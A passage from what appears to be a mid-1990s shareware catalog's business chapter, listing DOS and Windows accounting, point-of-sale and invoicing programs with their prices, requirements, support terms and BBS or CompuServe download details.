LAN license; site license; bonus utilities; bonus data; + + Chapter 7, "Business" 313 + + + + discounts on other products; discounts on upgrades. 1-month + free upgrading allowed. 1 free update disk(s) sent out. + Look for: DAYOVE.EXE on BBSs (multiple files) (call 407-292-4921 + to download it at no charge); DAYOVE.EXE on CompuServe in + CIS:ACCOUNTING forum LIBrary 5 (multiple files) (or contact + userID 76367,1401 for assistance). + Download size: 320k (about 24 minutes with a 2400 baud modem) + Description: + The 'final chapter' to the processing and maintenance of all + your Payables. Its key mission is to process/post your purchase + orders, however, many other routines have been provided, ie: + expense maintenance, 1099 MISC forms, purchase clearing, vendor + maintenance, hand/manual checks, batch checks, recurring + checks, unlimited bank accounts, unlimited check printing + formats and many reports. + + + Product: DAYO ACCOUNTS RECEIVABLE (AR) + Author: TJS LAB, Inc., 407-291-3960 + Version: 4.61+ (03-01-94) + Needs: IBM PC, DOS 3.3 or better. 530k RAM; CGA monitor; Hard + disk; HP LaserJet printer; Epson printer. + Registration fee: $95.00 (add $5.00 for shipping to U.S. + addresses) (add $10.00 for shipping to Canadian addresses) (add + $20.00 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; printed + manual; quick-reference card; choice of 31/2" or 51/4" master + disk(s); 3 months of phone, fax, BBS, CompuServe, mail support; + LAN license; site license; bonus utilities; bonus data; + discounts on other products; discounts on upgrades. 1-month + free upgrading allowed. 1 free update disk(s) sent out. + Look for: DAYOAE.EXE on BBSs (multiple files) (call 407-292-4921 + to download it at no charge); DAYOAE.EXE on CompuServe in + CIS:ACCOUNTING forum LIBrary 5 (multiple files) (or contact + userID 76367,1401 for assistance). + Download size: 320k (about 24 minutes with a 2400 baud modem) + Description: + The 'final chapter' to the processing and maintenance of all + your receivables. Includes routines to handle cash receipts, + customers, invoice types, terms, taxcodes, sales persons, and + more. Many reports are included (ie: Ageing, Customer, Sales... + ). There is a routine to print Statements (ie: SMART, 90, 60, + 30 days), and another one to create and print 'non' standard + invoices (not applicable to DAYO POS). HP laser forms are + provided as an option for statements and invoices. + + Chapter 7, "Business" 314 + + + + Product: DAYO GENERAL LEDGER (GL) + Author: TJS LAB, Inc., 407-291-3960 + Version: 4.60+ (03-01-94) + Needs: IBM PC, DOS 3.3 or better. 530k RAM; CGA monitor; Hard + disk; HP LaserJet printer; Epson printer. + Registration fee: $95.00 (add $5.00 for shipping to U.S. + addresses) (add $10.00 for shipping to Canadian addresses) (add + $20.00 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; printed + manual; quick-reference card; choice of 31/2" or 51/4" master + disk(s); 3 months of phone, fax, BBS, CompuServe, mail support; + LAN license; site license; bonus utilities; bonus data; + discounts on other products; discounts on upgrades. 1-month + free upgrading allowed. 1 free update disk(s) sent out. + Look for: DAYOGE.EXE on BBSs (multiple files) (call 407-292-4921 + to download it at no charge); DAYOGE.EXE on CompuServe in + CIS:ACCOUNTING forum LIBrary 5 (multiple files) (or contact + userID 76367,1401 for assistance). + Download size: 330k (about 25 minutes with a 2400 baud modem) + Description: + Provides a means to manage and report company finances. Totally + integrated with the other DAYO packages. Features include + computer generated posting, multiuser, double entry, export + data, 30+ reports, budget management and unlimited accounts. + + + Product: DAYO TIME & BILLING + Author: TJS LAB, Inc., 407-291-3960 + Version: 4.50+ (12-01-93) + Needs: IBM PC, DOS 3.3 or better. 530k RAM; CGA monitor; Hard + disk; HP LaserJet printer; Epson printer. + Registration fee: $95.00 (add $5.00 for shipping to U.S. + addresses) (add $10.00 for shipping to Canadian addresses) (add + $20.00 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; printed + manual; quick-reference card; choice of 31/2" or 51/4" master + disk(s); 3 months of phone, fax, BBS, CompuServe, mail support; + LAN license; site license; bonus utilities; bonus data; + discounts on other products; discounts on upgrades. 1-month + free upgrading allowed. 1 free update disk(s) sent out. + Look for: DAYOTE.EXE on BBSs (multiple files) (call 407-292-4921 + to download it at no charge); DAYOTE.EXE on CompuServe in + CIS:ACCOUNTING forum LIBrary 5 (multiple files) (or contact + userID 76367,1401 for assistance). + Download size: 340k (about 25 minutes with a 2400 baud modem) + Description: + Comprises a system of creating invoices for services and/or + products. It has support for an inventory, receivables, + projects and customers/clients. Other features include: + multiuser, unlimited records, project notes, customer notes, + 30+ reports, onscreen viewing of reports, databases are dBase + (tm) compatible, laser formats for invoices and statements, 2 + styles of statements/bills, printer setup & drivers and cash + drawers drivers. + + Chapter 7, "Business" 315 + + + + Product: EXPRESSCHECK + Menu driven checkbook manager. See full description on + page 400. + + Product: Fixed Asset Pro [***] + Author: HammerSoft, Inc., 419-986-6007 + Version: 2.1 (07-15-95) + Needs: IBM PC, DOS 3.0 or better. 480k RAM; Hard disk. + Registration fee: $79.95 (add $5.00 for shipping to U.S. + addresses) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); lifetime unlimited phone, fax, CompuServe, mail + support; 2-month return policy; discounts on other products. + Look for: availability unknown on BBSs; FAPRO.ZIP on CompuServe + in CIS:PCAPP forum LIBrary 5 (multiple files) (or contact + userID 71540,3266 for assistance). + Download size: 475k (about 35 minutes with a 2400 baud modem) + Special instructions: Product distribution restricted to the + United States. + Description: + A comprehensive fixed asset depreciation system. Using pull + down menus the program calculates depreciation on multiple + bases, applies tax limits, performs projections and + comparisons, and prints reports to screen, printer or file. + Provides 38 U.S. tax law depreciation methods with online help. + Mouse support. Manual includes a tutorial. + + + Product: Judy's TenKey + Powerful, flexible Windows calculator. See full description on + page 148. + + Product: LABELS-PLUS Labeling System + Bar code label print system. See full description on page 94. + + Product: The Lawyer's DeskTop + Integrated legal management system. See full description on + page 361. + + Product: Loan Master + Author: Bottom Line Software, Inc., 214-394-4087 + Version: 1.52.14 (10-01-94) + Needs: IBM PC, DOS 3.3 or better. 640k RAM; CGA monitor; Hard + disk; HP DeskJet printer; HP LaserJet printer; Epson printer. + Registration fee: $495.00 (Canadian dollars) (add $3.00 (Canadian + dollars) for shipping to U.S. addresses) (add $10.00 (Canadian + dollars) for shipping to Canadian addresses) + Registration benefits: printed manual; quick-reference card; + choice of 31/2" or 51/4" master disk(s); 2 months of phone, fax, + BBS, newsletter, mail support; all ASP-wide offers (see + + Chapter 7, "Business" 316 + + + + page 6); discounts on upgrades. 12-month free upgrading + allowed. + Look for: availability unknown on BBSs. + Download size: 700k (about 52 minutes with a 2400 baud modem) + Special instructions: Product distribution restricted to the + United States. + Description: + A complete loan accounting and tracking system that maintains + and reports interest and late charges due. Prints trial + balances, past due, payments received, and loan transaction + statements. Prints past due and billing notices. Prints year + end statements. Maintains an optional escrow balance. Has + options to compute daily interest accruals or to track an + amortization schedule. + + + Product: OMS (Organizational Mgmt System + Management system for non-profit orgs. See full description on + page 370. + + Product: Paper Route Ledger + Author: RMH Computer Services, 317-782-9903 + Version: 1.40 (04-25-94) + Needs: IBM PC, DOS 3.3 or better. 512k RAM; Hard disk. + Strongly recommended: Hercules monitor; Epson printer. + Registration fee: $19.00 (add $5.00 for shipping outside U.S. or + Canada) + Registration benefits: Full program functionality; choice of 31/2" + or 51/4" master disk(s); 3 months of unlimited BBS, CompuServe, + mail support; 1-month return policy; all ASP-wide offers (see + page 6). + Look for: PRL140.ZIP on BBSs (call 317-784-2147 to download it at + no charge); PRL.ZIP on CompuServe in CIS:IBMAPP forum LIBrary 7 + (or contact userID 73567,1547 for assistance). + SWREG#: 2446 + Download size: 312k (about 23 minutes with a 2400 baud modem) + Description: + Computerize and automate your paper route bookkeeping with this + unique program. Keeps track of customers, addresses, delivery + route order, route listing, collections, billings, tips, etc. + Print reports on your customer list, collections, route + listing, etc. Will handle multiple Delivery types (i.e. weekly, + weekdays only, weekends only, etc). Handles direct pay and + customers who pay through the newspaper offices. + + Chapter 7, "Business" 317 + + + + Product: PC-AP + Author: Medlin Accounting Shareware, 707-255-4475 + Version: 1.8 (01-01-94) + Needs: IBM PC, DOS 3.0 or better. 256k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive. + Registration fee: $35.00 + Registration benefits: choice of 31/2" or 51/4" master disk(s); + lifetime phone, fax, mail support; 2-month return policy; + discounts on other products; discounts on upgrades. + Look for: MEDLIN.ZIP on BBSs (call 707-257-2338 to download it at + no charge); MEDLIN.ZIP on CompuServe in CIS:IBMAPP forum + LIBrary 5 (or contact userID 71520,61 for assistance); + MEDLIN.ZIP on GEnie in IBMPC forum LIBrary 3. + Download size: 299k (about 22 minutes with a 2400 baud modem) + Description: + A fast, simple accounts payable program integrated with PC-GL. + Allows you to quickly enter vendors, enter invoices, choose + invoice for payment and print checks. Reports include check + listing, invoice listing, vendor listing, vendor activity + report and mailing labels. Allows up to 2000 vendors and 2000 + invoices/checks per month. Invoices and checks may be sorted + by any field. Maintains check book balance and posts checks to + PC-GL each month. Can read payroll checks from our PC-PR. + + + Product: PC-AR + Accounts receivable. See full description on page 329. + + Product: PC-FOOD II FOOD COSTING + Professional food costing. See full description on page 359. + + Product: PC-GL + Author: Medlin Accounting Shareware, 707-255-4475 + Version: 3.8 (01-01-94) + Needs: IBM PC, DOS 3.0 or better. 256k RAM. + Registration fee: $35.00 + Registration benefits: choice of 31/2" or 51/4" master disk(s); + lifetime phone, fax, mail support; discounts on upgrades. + Look for: MEDLIN.ZIP on BBSs (call 707-257-2338 to download it at + no charge); MEDLIN.ZIP on CompuServe in CIS:IBMAPP forum + LIBrary 5 (or contact userID 71520,61 for assistance); + MEDLIN.ZIP on GEnie in IBMPC forum LIBrary 3. + Download size: 299k (about 22 minutes with a 2400 baud modem) + Description: + A fast, simple general ledger program. It includes an easily + modified standard chart of accounts. The program prints an + income statement with current, year to date and prior year + percents and a three column balance sheet. Other reports + include a general ledger for current and year to date and a + number of different transaction listings. Each entry is + instantly verified. Allows up to 800 items in the chart of + accounts and up to 8000 transactions per month. + + Chapter 7, "Business" 318 + + + + Product: PC-PR + Payroll writing. See full description on page 333. + + Product: PCINV + Author: Medlin Accounting Shareware, 707-255-4475 + Version: 1.3 (01-01-94) + Needs: IBM PC, DOS 3.0 or better. 256k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive; HP DeskJet printer; HP LaserJet printer; Postscript + printer; Epson printer. + Registration fee: $35.00 + Registration benefits: choice of 31/2" or 51/4" master disk(s); + lifetime phone, fax, mail support; 2-month return policy; + discounts on other products; discounts on upgrades. + Look for: MEDLIN.ZIP on BBSs (call 707-257-2338 to download it at + no charge); MEDLIN.ZIP on CompuServe in CIS:IBMAPP forum + LIBrary 5 (or contact userID 71520,61 for assistance); + MEDLIN.ZIP on GEnie in IBMPC forum LIBrary 3. + Download size: 299k (about 22 minutes with a 2400 baud modem) + Description: + A fast, simple invoice writing program integrated with the PC- + AR program. Enter up to 50 lines of 42 character invoice + detail. Calculates sales tax on taxable items. Allows + multiple line descriptions which can include costs times + amount. Prints on 7" or 11" preprinted forms or plain paper. + Prints invoices as you enter them and does not allow for batch + printing or editing previous invoices. Invoices are immediately + posted to PC-AR. Handles multiple tax rates. + + + Product: Personal Finances 2 + Full function personal/small business finance. See full + description on page 395. + + Product: QUALITY MANAGEMENT SYSTEM + An accounting system for property managers. See full + description on page 366. + + Chapter 7, "Business" 319 + + + + Product: Rosewood Journal + Author: Rosewood Software, 416-284-6119 + Version: 5.02 (09-21-93) + Needs: IBM PC, DOS 2.11 or better. Program can run safely on a + system with no hard disk and only one floppy disk drive; Hard + disk. + Registration fee: $38.00 + Registration benefits: choice of 31/2" or 51/4" master disk(s); + lifetime unlimited phone, CompuServe, mail support; lifetime + return policy; royalty-free runtime license; all ASP-wide + offers (see page 6); disks of other shareware. + Look for: ROSEJ502.ZIP on BBSs; RJ502.ZIP on CompuServe in + CIS:IBMAPP forum LIBrary 6 (or contact userID 70461,2507 for + assistance). + Download size: 146k (about eleven minutes with a 2400 baud modem) + Description: + An invoice journal and complete accounts receivable package + written specifically for small to medium size businesses. + Allows easy entry of invoice data because of its intuitive + input and automatic account search. It will generate monthly + and yearly reports and aged accounts receivable lists and + statements ready for window envelopes. Up to 2 levels of sales + tax. A label maker is built in. There are many other features + designed to make sales accounting easy. + + + Product: Time is Money + A time and fixed price billing system. See full description on + page 330. + + Product: WInvoices + Invoicing program and much more! See full description on + page 330. + + Product: XPENS + Author: Richard A. Williams, 815-455-6333 + Version: 1.3 (01-01-94) + Needs: IBM PC, DOS 2.0 or better. HP LaserJet printer; Epson + printer. + Registration fee: $29.00 + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); 3 months of phone, CompuServe, GEnie, mail + support; all ASP-wide offers (see page 6). + Look for: availability unknown on BBSs; XPENS.ZIP on CompuServe + in CIS:PCAPP forum LIBrary 5 (or contact userID 72317,2073 for + assistance); XPENS.ZIP on GEnie in IBMPC forum LIBrary 15 (or + contact userID R.WILLIAMS5 for assistance). + PsL#: 10475 + Download size: 47k (about four minutes with a 2400 baud modem) + Description: + Designed to provide employers and employees with a quick, easy + to use expense account screen/report that will eliminate the + necessity of keeping a supply of expense report forms and doing + all the arithmetic involved in preparing the report. Because + + Chapter 7, "Business" 320 + + + + reports are stored on disk, the employee copy of the report + becomes unnecessary. + + + 7.1.1.1 Accounts receivable + + Product: CashMaster + Produces bid, invoice, statements; tracks A/R. See full + description on page 326. + + 7.1.2 Point-of-sale systems + + Product: Bottom Line Accounting + Small business accounting software. See full description on + page 311. + + Product: DAYO LITTLE POS + Author: TJS LAB, Inc., 407-291-3960 + Version: 4.62+ (03-15-94) + Needs: IBM PC, DOS 3.3 or better. 530k RAM; CGA monitor; Hard + disk; HP LaserJet printer; Epson printer. Dayo pos. + Registration fee: $35.00 (add $5.00 for shipping to U.S. + addresses) (add $10.00 for shipping to Canadian addresses) (add + $20.00 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; choice of 31/2" + or 51/4" master disk(s); 3 months of phone, fax, BBS, CompuServe, + mail support; LAN license; site license; bonus utilities; bonus + data; discounts on other products; discounts on upgrades. + 1-month free upgrading allowed. 1 free update disk(s) sent + out. + Look for: DAYOPS.EXE on BBSs (call 407-292-4921 to download it at + no charge); DAYOPS.EXE on CompuServe in CIS:ACCOUNTING forum + LIBrary 5 (or contact userID 76711,1173 for assistance). + Download size: 250k (about 19 minutes with a 2400 baud modem) + Description: + A modified version of DAYO POS create to reduce memory + requirement. Useful on LANs and/or networks where memory is + usually at a premium. + + + Product: DAYO ORDER ENTRY + Author: TJS LAB, Inc., 407-291-3960 + Version: 4.60+ (03-01-94) + Needs: IBM PC, DOS 3.3 or better. 530k RAM; CGA monitor; Hard + disk; HP LaserJet printer; Epson printer. Dayo pos. + Registration fee: $95.00 (add $5.00 for shipping to U.S. + addresses) (add $10.00 for shipping to Canadian addresses) (add + $20.00 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; printed + manual; quick-reference card; choice of 31/2" or 51/4" master + disk(s); 3 months of phone, fax, BBS, CompuServe, mail support; + LAN license; site license; bonus utilities; bonus data; + + Chapter 7, "Business" 321 + + + + discounts on other products; discounts on upgrades. 1-month + free upgrading allowed. 1 free update disk(s) sent out. + Look for: DAYOZE.EXE on BBSs (call 407-292-4921 to download it at + no charge); DAYOZE.EXE on CompuServe in CIS:ACCOUNTING forum + LIBrary 5 (or contact userID 76367,1401 for assistance). + Download size: 300k (about 23 minutes with a 2400 baud modem) + Description: + Creates sales orders based on the DAYO Inventory, Customer, and + other DAYO databases. Orders can be printed on a standard + printer or a Hewlett Packard(tm) Laserjet compatible printer. + The order can be printed on a pre-printed form, on the Laser + printer in a special laser format, or as a standard/default + form. + + + Product: DAYO POS (POINT OF SALE) + Author: TJS LAB, Inc., 407-291-3960 + Version: 4.61+ (03-01-94) + Needs: IBM PC, DOS 3.3 or better. 530k RAM; CGA monitor; Hard + disk; HP LaserJet printer; Epson printer. + Registration fee: $95.00 (add $5.00 for shipping to U.S. + addresses) (add $10.00 for shipping to Canadian addresses) (add + $20.00 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; printed + manual; quick-reference card; choice of 31/2" or 51/4" master + disk(s); 3 months of phone, fax, BBS, CompuServe, mail support; + LAN license; site license; bonus utilities; bonus data; + discounts on other products; discounts on upgrades. 1-month + free upgrading allowed. 1 free update disk(s) sent out. + Look for: DAYOPE.EXE on BBSs (multiple files) (call 407-292-4921 + to download it at no charge); DAYOPE.EXE on CompuServe in + CIS:ACCOUNTING forum LIBrary 5 (multiple files) (or contact + userID 76367,1401 for assistance). + Download size: 320k (about 24 minutes with a 2400 baud modem) + Description: + A billing and invoicing application for any size business. It + is the DAYO module that permits you to invoice out your + products while keeping an accurate record of all your 'sales'. + Features include: multiuser (ie: Novell), registers, quote + interface, templates, back orders, cash drawers, packing/ + shipping lists, labels, sales graphs, special pricing, tax + codes, terms codes, credit limits, passwords, MRP interface, + multiple prices, and many reports. + + + Product: DAYO PRICE BOOK + DAYO special pricing, price books & lists. See full + description on page 374. + + Chapter 7, "Business" 322 + + + + Product: DAYO QUOTES + Author: TJS LAB, Inc., 407-291-3960 + Version: 4.61+ (02-01-94) + Needs: IBM PC, DOS 3.3 or better. 530k RAM; CGA monitor; Hard + disk; HP LaserJet printer; Epson printer. + Registration fee: $50.00 (add $5.00 for shipping to U.S. + addresses) (add $10.00 for shipping to Canadian addresses) (add + $20.00 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; printed + manual; quick-reference card; choice of 31/2" or 51/4" master + disk(s); 3 months of phone, fax, BBS, CompuServe, mail support; + LAN license; site license; bonus utilities; bonus data; + discounts on other products; discounts on upgrades. 1-month + free upgrading allowed. 1 free update disk(s) sent out. + Look for: DAYOQE.EXE on BBSs (call 407-292-4921 to download it at + no charge); DAYOQE.EXE on CompuServe in CIS:ACCOUNTING forum + LIBrary 5 (or contact userID 76367,1401 for assistance). + Download size: 310k (about 23 minutes with a 2400 baud modem) + Description: + Creates sales order quotes based on the DAYO Inventory, + Customer, and other DAYO databases. Quotes can be printed on a + standard printer or a Hewlett Packard Laserjet compatible + printer. The quote can be printed on a pre-printed form, on the + laser printer in a special laser format, or as a standard/ + default form. Totally integrated with the DAYO POS and/or + billing & invoicing modules. Templates (kits or bundles), are + supported. + + + Product: DAYO RENTAL POS + Author: TJS LAB, Inc., 407-291-3960 + Version: 4.61+ (02-01-94) + Needs: IBM PC, DOS 3.3 or better. 530k RAM; CGA monitor; Hard + disk; HP LaserJet printer; Epson printer. Dayo pos. + Registration fee: $35.00 (add $5.00 for shipping to U.S. + addresses) (add $10.00 for shipping to Canadian addresses) (add + $20.00 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; printed + manual; quick-reference card; choice of 31/2" or 51/4" master + disk(s); 3 months of phone, fax, BBS, CompuServe, mail support; + LAN license; site license; bonus utilities; bonus data; + discounts on other products; discounts on upgrades. 1-month + free upgrading allowed. 1 free update disk(s) sent out. + Look for: DAYOPR.EXE on BBSs (call 407-292-4921 to download it at + no charge); DAYOPR.EXE on CompuServe in CIS:ACCOUNTING forum + LIBrary 5 (or contact userID 76711,1173 for assistance). + Download size: 300k (about 23 minutes with a 2400 baud modem) + Description: + A billing and invoicing application for any business that rents + items, equipment, or services, ie: videos, tapes, furniture, + tools, appliances, etc. Requires the regular DAYO POS module + for its reports and configuration settings. It is by default a + multiuser system, allowing almost unlimited numbers of users to + + Chapter 7, "Business" 323 + + + + have the ability to simultaneously invoice using this one + program on a PC based LAN/network. + + + Product: DAYO SIMPLE POS + Author: TJS LAB, Inc., 407-291-3960 + Version: 4.61+ (01-01-94) + Needs: IBM PC, DOS 3.3 or better. 530k RAM; CGA monitor; Hard + disk; HP LaserJet printer; Epson printer. Dayo pos. + Registration fee: $35.00 (add $5.00 for shipping to U.S. + addresses) (add $10.00 for shipping to Canadian addresses) (add + $20.00 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; choice of 31/2" + or 51/4" master disk(s); 3 months of phone, fax, BBS, CompuServe, + mail support; LAN license; site license; bonus utilities; bonus + data; discounts on other products; discounts on upgrades. + 1-month free upgrading allowed. 1 free update disk(s) sent + out. + Look for: DAYOP1.EXE on BBSs (call 407-292-4921 to download it at + no charge); DAYOP1.EXE on CompuServe in CIS:ACCOUNTING forum + LIBrary 5 (or contact userID 76711,1173 for assistance). + Download size: 310k (about 23 minutes with a 2400 baud modem) + Description: + A a modified version of DAYO POS that was created to exclude + the option of selecting a customer. This program is used on + cash accounts only. Useful in grocery store type environments + (where no customer name is required). + + + Product: PCINV + Invoice writing. See full description on page 318. + + Product: Sales & Samples + Order & invoicing for home cosmetics sales. See full + description on page 369. + + Chapter 7, "Business" 324 + + + + Product: Track-It + Author: Millennium Software, 510-828-5892 + Version: 3.07 (12-29-93) + Needs: IBM PC, DOS 3.0 or better. 425k RAM; Hard disk. + Strongly recommended: EGA monitor; Mouse. + Registration fee: $149.00 (add $5.00 for shipping to U.S. + addresses) (add $5.00 for shipping to Canadian addresses) (add + $7.50 for shipping outside U.S. or Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); 12 + months of unlimited BBS, CompuServe, mail support; LAN license; + discounts on upgrades; registration commissions. 1 free update + disk(s) sent out. + Look for: TRKIT307.ZIP on BBSs (call 510-828-4153 to download it + at no charge); TRACKI.ZIP on CompuServe in CIS:IBMAPP forum + LIBrary 6 (or contact userID 72560,2466 for assistance). + Download size: 343k (about 26 minutes with a 2400 baud modem) + Description: + Includes a wide variety of inventory functions as well as + invoicing, order entry, and purchase orders. Tracks both + serialized and non-serialized stock. Includes 35+ reports, + mouse support, on-line help, and a full manual. The number of + stock codes is limited only by disk space. Network and multi- + user compatible. + + + 7.1.3 Billing/invoice systems + + Product: CashMaster + Author: Contractor Information Systems, Inc., 908-288-1502 + Version: 1.51 (03-05-95) + Needs: IBM PC, DOS 3.1 or better. 450k RAM; Hard disk. + Strongly recommended: HP DeskJet printer; HP LaserJet printer; + Epson printer. + Registration fee: $75.00 (add $4.00 for shipping to U.S. + addresses) (add $8.00 for shipping to Canadian addresses) (add + $15.00 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; printed + manual; choice of 31/2" or 51/4" master disk(s); 3 months of + unlimited phone, fax, CompuServe, mail support; all ASP-wide + offers (see page 6); discounts on other products; discounts on + upgrades. 12-month free upgrading allowed. 1 free update + disk(s) sent out. + Look for: availability unknown on BBSs; CIM151.ZIP on CompuServe + in CIS:ACCOUNTING forum LIBrary 15 (or contact userID + 76506,1606 for assistance). + SWREG#: 4956 + PsL#: 11903 + Download size: 350k (about 26 minutes with a 2400 baud modem) + Description: + A bid and invoice generator for anyone requiring a large amount + of text (up to 20 lines per bid/invoice) to describe the work + being done ('scope of work'). It allows for unlimited line + items per bid/invoice with each line item having up to three + additional lines of description. Tracks open receivables by + + Chapter 7, "Business" 325 + + + + customer and job. Originally written for sub-contractors who + need to keep track of open invoices to both general contractors + and homeowners. Bookkeeping know-how not needed. + + + Product: DAYO BACK ORDERS (BO) + Author: TJS LAB, Inc., 407-291-3960 + Version: 4.50+ (02-01-94) + Needs: IBM PC, DOS 3.3 or better. 530k RAM; CGA monitor; Hard + disk; HP LaserJet printer; Epson printer. + Registration fee: $35.00 (add $5.00 for shipping to U.S. + addresses) (add $10.00 for shipping to Canadian addresses) (add + $20.00 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; printed + manual; quick-reference card; choice of 31/2" or 51/4" master + disk(s); 3 months of phone, fax, BBS, CompuServe, mail support; + LAN license; site license; bonus utilities; bonus data; + discounts on other products; discounts on upgrades. 1-month + free upgrading allowed. 1 free update disk(s) sent out. + Look for: DAYOOE.EXE on BBSs (call 407-292-4921 to download it at + no charge); DAYOOE.EXE on CompuServe in CIS:ACCOUNTING forum + LIBrary 5 (or contact userID 76367,1401 for assistance). + Download size: 310k (about 23 minutes with a 2400 baud modem) + Description: + The maintenance module for the processing of all your + customers/sales backorders. Working with DAYO POS, it + determines and manages the filling (allocation) of your + customers backorders. It does this through an allocation + process that determines what backordered items are 'fillable' + because of receipts into the inventory. Creates the same type + invoices as DAYO POS. + + + Product: DAYO BILLING & INVOICING + Author: TJS LAB, Inc., 407-291-3960 + Version: 4.61+ (03-01-94) + Needs: IBM PC, DOS 3.3 or better. 530k RAM; CGA monitor; Hard + disk; HP LaserJet printer; Epson printer. + Registration fee: $95.00 (add $5.00 for shipping to U.S. + addresses) (add $10.00 for shipping to Canadian addresses) (add + $20.00 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; printed + manual; quick-reference card; choice of 31/2" or 51/4" master + disk(s); 3 months of phone, fax, BBS, CompuServe, mail support; + LAN license; site license; bonus utilities; bonus data; + + Chapter 7, "Business" 326 + + + + discounts on other products; discounts on upgrades. 1-month + free upgrading allowed. 1 free update disk(s) sent out. + Look for: DAYOBI.EXE on BBSs (multiple files) (call 407-292-4921 + to download it at no charge); DAYOBI.EXE on CompuServe in + CIS:ACCOUNTING forum LIBrary 5 (multiple files) (or contact + userID 76367,1401 for assistance). + Download size: 345k (about 26 minutes with a 2400 baud modem) + Description: + Permits you to invoice your products while keeping an accurate + record of all your 'sales'. Features include: Multiuser (ie: + Novell), registers, quote interface, templates, back orders, + cash drawers, packing/shipping lists, labels, sales graphs, + special pricing, tax codes, terms codes, credit limits, + passwords, MRP interface, multiple prices, and many reports. + Very similar to DAYO POS, and uses the same manual. + + + Product: DAYO SALES MANAGEMENT SYSTEM + Manage schedules; create quotes & price books. See full + description on page 354. + + Product: Financial Freedom Billing Mgr. + Author: M & R Technologies, Inc., 407-951-2268 + Version: 2.3 (12-15-94) + Needs: IBM PC, Windows 3.0 or better. EGA monitor; Hard disk. + Registration fee: $35.00 + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); lifetime unlimited phone, fax, CompuServe, mail + support; bonus utilities; all ASP-wide offers (see page 6); + discounts on other products. + Look for: FFBMGR.ZIP on BBSs; FFBMGR.ZIP on CompuServe in + CIS:WINSHARE forum LIBrary 11. + Download size: 619k (about 46 minutes with a 2400 baud modem) + Description: + Features include unlimited customers, three invoice printing + formats, user-selectable report sorting and sub-total options, + creates and prints mailing lists. Maintains purchase + histories, monthly and yearly summaries and many more reporting + options. Designed for any type of business activity. Will + streamline your billing and collection activities! + + + Product: Flexitime/Time Logging + Integrated time logging, recording, billing. See full + description on page 346. + + Chapter 7, "Business" 327 + + + + Product: J.T.S. TIME SHEETS + Author: Easy Software, 01625-614669 + Version: 1 (09-20-94) + Needs: IBM PC, DOS 5.0 or better. 640k RAM; Hard disk. + Strongly recommended: EMS memory. + Registration fee: $49.00 + Registration benefits: Full program functionality; 3 months of + phone, CompuServe, mail support; all ASP-wide offers (see + page 6). + Look for: availability unknown on BBSs. + SWREG#: 3533 + PsL#: 11594 + Download size: 700k (about 52 minutes with a 2400 baud modem) + Description: + Creates client bills based on the time spent on the clients + accounts by the firms employees. Each employee can have a + separate charge out rate per hour. In addition to timed entries + the time sheets accept fixed price items and pre payments by + clients. The system also keeps an up to date "Work in Hand" + figure for accounting purposes. + + + Product: The Lawyer's DeskTop + Integrated legal management system. See full description on + page 361. + + Product: PC-AR + Author: Medlin Accounting Shareware, 707-255-4475 + Version: 4.3 (01-01-94) + Needs: IBM PC, DOS 3.0 or better. 256k RAM. + Registration fee: $35.00 + Registration benefits: choice of 31/2" or 51/4" master disk(s); + lifetime phone, fax, mail support; 2-month return policy; + discounts on other products. + Look for: MEDLIN.ZIP on BBSs (call 707-257-2338 to download it at + no charge); MEDLIN.ZIP on CompuServe in CIS:IBMAPP forum + LIBrary 5 (or contact userID 71520,61 for assistance); + MEDLIN.ZIP on GEnie in IBMPC forum LIBrary 3. + Download size: 299k (about 22 minutes with a 2400 baud modem) + Description: + A fast, simple accounts receivable and sales summary program to + get the bills out. Contains many powerful features such as + auto billing, late charges, aging and alpha account numbers. + Reports include plain paper or pre printed statements, accounts + receivable ledger, charges and payments listing, sales summary + (with or without detail), customer activity report, mailing + labels and aging report. Inactive customers may be omitted + from most reports. Up to 8000 customers and invoices per + month. + + + Product: Qanalyst + Phone bill analyzer for people who use Qmodem. See full + description on page 441. + + Chapter 7, "Business" 328 + + + + Product: Rosewood Journal + Invoice journal and accounts receivable. See full description + on page 318. + + Product: Sales & Samples + Order & invoicing for home cosmetics sales. See full + description on page 369. + + Product: Time is Money + Author: Custom Data Solutions, 407-767-9278 + Version: 2.3 (12-07-94) + Needs: IBM PC, DOS 2.0 or better. 450k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive. + Strongly recommended: Hard disk. + Registration fee: $95.00 + Registration benefits: 31/2" master disk(s); 51/4" master disk(s); 3 + months of unlimited phone, CompuServe, mail support; source + code; all ASP-wide offers (see page 6). + Look for: TIM23.ZIP on BBSs; TIM23.ZIP on CompuServe in + CIS:CONSULT forum LIBrary 8 (or contact userID 76702,1355 for + assistance). + Download size: 195k (about 15 minutes with a 2400 baud modem) + Description: + A time and fixed price billing system that completely automates + your billing and receivables. It supports time billing in any + increment, and also the sale of equipment or fixed price + contracts. Facilitates the time recording and billing process + for anyone that bills by time and project. Maintains records, + automatically generates invoices, and keeps a history of the + payment of those invoices. Simple to operate, yet versatile. + + + Product: Tolman Dental Program + Dental office managment program. See full description on + page 363. + + Chapter 7, "Business" 329 + + + + Product: WInvoices + Author: Q&D Software Development, 201-635-1824 + Version: 1.0d (05-31-95) + Needs: IBM 80386, Windows 3.1 or better. 4000k RAM; VGA monitor; + Hard disk; Mouse; VBRUN300.DLL. + Strongly recommended: Epson printer. + Registration fee: $29.95 (add $3.95 for shipping to U.S. + addresses) (add $4.95 for shipping to Canadian addresses) (add + $4.95 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; 31/2" master + disk(s); lifetime unlimited phone, CompuServe, mail support; + all ASP-wide offers (see page 6). Lifetime free upgrading + allowed. + Look for: WINV10D.ZIP on BBSs; WINV.ZIP on CompuServe 